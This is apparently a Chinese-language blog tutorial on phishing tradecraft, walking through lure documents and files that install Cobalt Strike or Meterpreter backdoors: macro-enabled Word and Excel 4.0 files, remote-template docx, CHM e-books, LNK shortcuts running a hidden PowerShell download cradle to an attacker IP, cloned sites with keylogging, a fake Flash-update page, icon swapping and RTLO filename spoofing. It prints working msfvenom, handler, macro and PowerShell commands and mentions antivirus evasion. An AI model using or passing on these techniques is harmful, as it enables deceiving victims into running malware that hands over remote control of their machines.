Office钓鱼攻击一、环境和工具二、启动CobaltStrike
首先我们启动一下cs,在这个文件里面开启终端
#CS参考链接
启动服务的,kail的IP再加上自定义密码
./teamserver 192.168.52.134 123456
然后找到这个对应的客户端输入kali的ip和默认端口还有密码就行了
然后我们增加一个监听,添加kali的ip就行了
三、生成木马
跟着操作步骤来就行
选择我们的监听器
然后复制下payload
四、Docm格式上线CobaltStrike
首先我们准备一个文档,取一个比较容易让人点开的名字就行
打开文档,我们点击文件,找到选项-自定义功能区-开发工具(没有的话操作)
然后我们在界面点击宏
然后选择我们的模板营销引流,如果需要所以模板选择第一个,点击创建
然后出现这个,需要替换我们CS生成的payload,然后选择outo_open
然后保存出现这个,选择否,然后就会另存为
然后我们需要保存docm格式,这里如果我们保存dotm格式,那么我们打开启用宏才可以上线
然后生成一个docm的文档,直接双击打开win11怎么修改文件后缀名格式,启用宏就会上线
五、Docx格式上线CobaltStrike
当然我们一般文档是docx的文档,所以我们需要改成docx的文档达到上线的目的,我们先启动一个python的http服务
python -m SimpleHTTPServer 8888
:8888/通知.docm
然后我们新建一个文档docx,选择任意一个模板保存docx就行
然后我们需要把这个我的简历后缀名改成zip格式
然后解压出来之后,我们找到word下面_rels下的settings.xml.rels文件,注意这里需要复制出来修改然后进行替换
进行修改里面的地址,改成我们的钓鱼文件
然后我们按照这样的形式压缩回zip格式
然后改回docx格式
直接打开docx文档就直接上线了
Excel4.0钓鱼攻击一、环境和工具二、生成msi木马
使用msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.134lport=3333-f msi -o banxain.msi
然后我们启动msfconsole开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
SetLHOST 192.168.52.134
Set lport 3333
Run
三、上线msf
首先我们先创建一个excle4.0宏表格
然后我们使用这段代码,插入第一行和第二行,然后输入Auto_Open,Enter回车,注意输入的时候双引号一定要是英文的
=EXEC(“msiexec /q /i:8888//banxian.msi”)
=HALT()
然后右键进行隐藏
然后我们保存,选择否,另存为选择启用宏的工作谱,格式xlsm
然后我们打开一下文件,并且需要点击启用内容
成功上线msf
CHM电子书钓鱼攻击一、环境和工具二、生成payload
首先我们先使用MyJSRat工具生成恶意地址,connect是回连地址,wtf是恶意代码地址
python MyJSRat.py -i 192.168.52.134 -p 9999
我们用到第二个wtf恶意代码地址里面的恶意代码
:9999/wtf
三、CHM的恶意html文件
我们这里建一个txt,加入这段html代码,然后改成我们的恶意代码
然后另存为html,格式要改成ANSI
四、EasyCHM生成CHM
使用这个工具生成chm
编译生成就行了
五、上线shell
这里是直接监听的
我们直接打开我们生成chm电子书就行了,不过会拦截,所以要做免杀自己可以去做,允许就上线了
lnk快捷方式钓鱼攻击一、环境和工具二、准备工作
我们需要先找到powershell.exe绝对路径
C:WindowsSystem32WindowsPowerShellv1.0
我们先生成一个powershell
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.52.134:80/a’))”
三、创建Ink快捷方式
首先我们随便创建一个快捷方式
然后我们要用绝对路径和payload衔接上,放到快捷方式的目标位置上
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.52.134:80/a’))”
然后我们需要换图标,更改图标位置是系统自带的
%SystemRoot%System32shell32.dll
四、上线CobaltStrike
直接开启监听CS,打开上线就好了
克隆网站钓鱼攻击一、环境和工具二、准备工作
测试一下,首先我们用cs克隆一个网站,勾上键盘劫持
可以看到是一模一样的
我们可以看到能够记录键盘输入的东西,证明是没问题的
那么,我们来生成以一个后门
生成一个hta的木马
然后我们把木马上传到文件下载这里
然后我的到一个下载地址
然后我们我们来克隆一个网站,需要克隆的网站和下载木马地址放上去
这样就得到一个可以下载木马的地址
三、上线CobaltStrike
怎么让对方打开木马文件就是另一回事了,打开文件就可以上线了,换了个exe马上线成功了,一样的操作
flash的网页钓鱼攻击一、环境和工具二、生成木马
首先我们只需要搭建flash网站
我们使用CobaltStrike生成payload
三、免杀
我们只需要把我们的payload进行免杀处理即可
通过工具进行免杀,这里就不提供免杀工具了,想免杀的自己去尝试吧,成功过了免杀
四、flash源码修改
这里把木马名字改成flashplayer_install_cn.exe,然后放到源码里面方便下载
这里还需要修改index.html文件,改成我们需要下载的木马地址
然后我们还需要加一个version.js文件,里面改成我们的地址
window.alert = function(name){
var iframe = document. createElement(“IFRAME”);
iframe.style.display=”none”;
iframe.setAttribute(“src”,’data:text/plain,’);
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( “您的FLASH版本过低,尝试升级后访问该页面! “);
window. location.href=”http://www.xxx.com”;
然后version.js加载到html里面需要钓鱼的网站上去,我这里在phpmyadmin里面创建一个htmlwin11怎么修改文件后缀名格式,加载进去
然后我们访问这个目标网站phpmyadmin的这个shouye.html地址,点击确定,就会跳转到我们的钓鱼网站
五、上线CobaltStrike
然后对方运行下载后的flash木马就会直接上线
图标钓鱼攻击一、环境和工具二、上线CobaltStrike
首先我们打开这个Restorator工具,把我们的免杀木马拖进这个工具
然后找个文件也拖进来,这里我找的是酷狗exe
然后我们把kugou.exe的图标复制到12.exe上面
然后保存,就会生成一个酷狗.exe,这样我们给别人也是可以上线的,也是可以更换图标的,导入图标就行
RTLO伪装文件钓鱼攻击一、环境和工具二、上线CobaltStrike
这个和图标钓鱼差不多,实际上,一个是图标的形式,一个是文件的形式,那么我们这里步骤省略,直接生成
我们这里直接修改文件,插入Unicode的RLO字符
然后我们会反着输入gnp.exe,然后查看属性可以看到,后缀是png格式的文件是一个exe伪装的木马文件
然后打开就可以直接上线
要吐了,写文章真累,这里就写了部分钓鱼手法,还有很多没写,然后那个免杀原本是有想写在里面的,但是想了一下算了,写出来容易被杀,然后百度了一些免杀的思路,具体是需要灵活运用吧
嫖免杀思路:
